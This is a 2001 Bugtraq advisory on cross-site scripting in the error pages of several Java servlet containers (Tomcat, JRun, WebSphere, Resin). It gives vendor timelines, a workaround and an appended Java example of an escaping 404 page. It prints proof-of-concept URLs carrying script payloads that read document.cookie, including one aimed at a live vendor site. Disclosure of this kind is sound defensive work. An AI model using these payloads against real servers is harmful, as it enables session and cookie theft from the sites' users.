Bugtraq: Java servlet cross-site scripting vulnerability
Jul 2, 2001, 16:43 UTC
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================
Affected products:
=================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
<http://jakarta.apache.org/tomcat/>
JRun 3.0
<http://www.allaire.com/products/jrun/index.cfm>
WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
<http://www-4.ibm.com/software/webservers/>
Resin
<http://www.caucho.com/products/resin/>
Not affected:
============
Unknown
Problem:
=======
When the following URLs are accessed, the JavaScript code is executed
in the browser in the context of the server's domain.
Tomcat 3.2.1:
http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
JRun 3.0:
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
WebSphere 3.02:
http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
Resin 1.2.2:
http://Resin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp
These pages produce output like this:
=================================================
Error 404
An error has occurred while processing request:
http://WebSphere/webapp/examples/******
Message: File not found: file://******
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
...
=================================================
******: The JavaScript code is executed here.
This vulnerability is quite similar to "IIS cross-site scripting
vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
<http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>
Impact:
======
For details about cross-site scripting, see the following pages.
<http://www.cert.org/advisories/CA-2000-02.html>
<http://www.microsoft.com/TechNet/security/crssite.asp>
<http://www.apache.org/info/css-security/>
Vendor status:
=============
Tomcat:
======
Notified:
16 Mar 2001 04:32:02 +0900
17 Mar 2001 18:55:45 +0900
Response:
17 Mar 2001 20:07:42 -0000
Fix:
30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
Announcement:
<http://jakarta.apache.org/tomcat/news.html>
Sun Microsystems does not publish Tomcat vulnerabilities.
<http://java.sun.com/products/jsp/tomcat/>
<http://java.sun.com/sfaq/chronology.html>
JRun:
====
Notified:
13 Mar 2001 23:11:54 +0900
Response:
13 Mar 2001 09:43:49 -0500
14 Mar 2001 09:05:03 -0500
Fix:
28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
Announcement:
<http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
Macromedia Product Security Bulletin (MPSB01-06)
JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
(a.k.a. JavaScript code execution vulnerability)
WebSphere:
=========
Notified:
20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
Response:
22 Mar 2001 09:14:01 -0500
23 Mar 2001 00:02:58 +0900
Fix:
PQ47386V302x (?)
<http://www-4.ibm.com/software/webservers/appserv/efix.html>
Announcement:
<http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
(in Japanese)
Resin:
=====
Notified:
16 Mar 2001 02:26:47 +0900
Response:
None
Fix:
Unknown
Announcement:
Unknown
http://www.caucho.com/products/resin/changes.xtp
Workaround:
==========
Customize error pages.
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/
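
The "Customize error pages" workaround, as an added example that is not part of the original advisory or any vendor's code: a custom 404 page only closes the hole if it HTML-escapes the requested path before echoing it. The class and method names are hypothetical, and plain Java is used instead of the servlet API so the file runs with a bare JDK.

```java
// Added illustration (not from the advisory): a custom "file not found" page
// that HTML-escapes the requested path before echoing it.
// Class and method names are hypothetical; no servlet API is used.
public class SafeErrorPage {

    // Replace the five characters that can change the HTML parsing context.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Behaviour the advisory describes: the request path is copied verbatim.
    static String defaultStyle404(String path) {
        return "<html><body><h1>Error 404</h1>"
             + "<p>File not found: " + path + "</p></body></html>";
    }

    // Customized page: same message, but the path is rendered as text.
    static String custom404(String path) {
        return "<html><body><h1>Error 404</h1>"
             + "<p>File not found: " + escapeHtml(path) + "</p></body></html>";
    }

    public static void main(String[] args) {
        // Constructed sample input: the request path from the advisory's Tomcat URL.
        String path = "/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp";

        System.out.println("unescaped: " + defaultStyle404(path));
        String safe = custom404(path);
        System.out.println("escaped:   " + safe);

        // The escaped page must contain no markup taken from the request.
        if (safe.contains("<SCRIPT>") || !safe.contains("&lt;SCRIPT&gt;")) {
            throw new AssertionError("path was not escaped");
        }
    }
}
```

A static error page that never echoes any part of the request is equally effective and leaves nothing to escape.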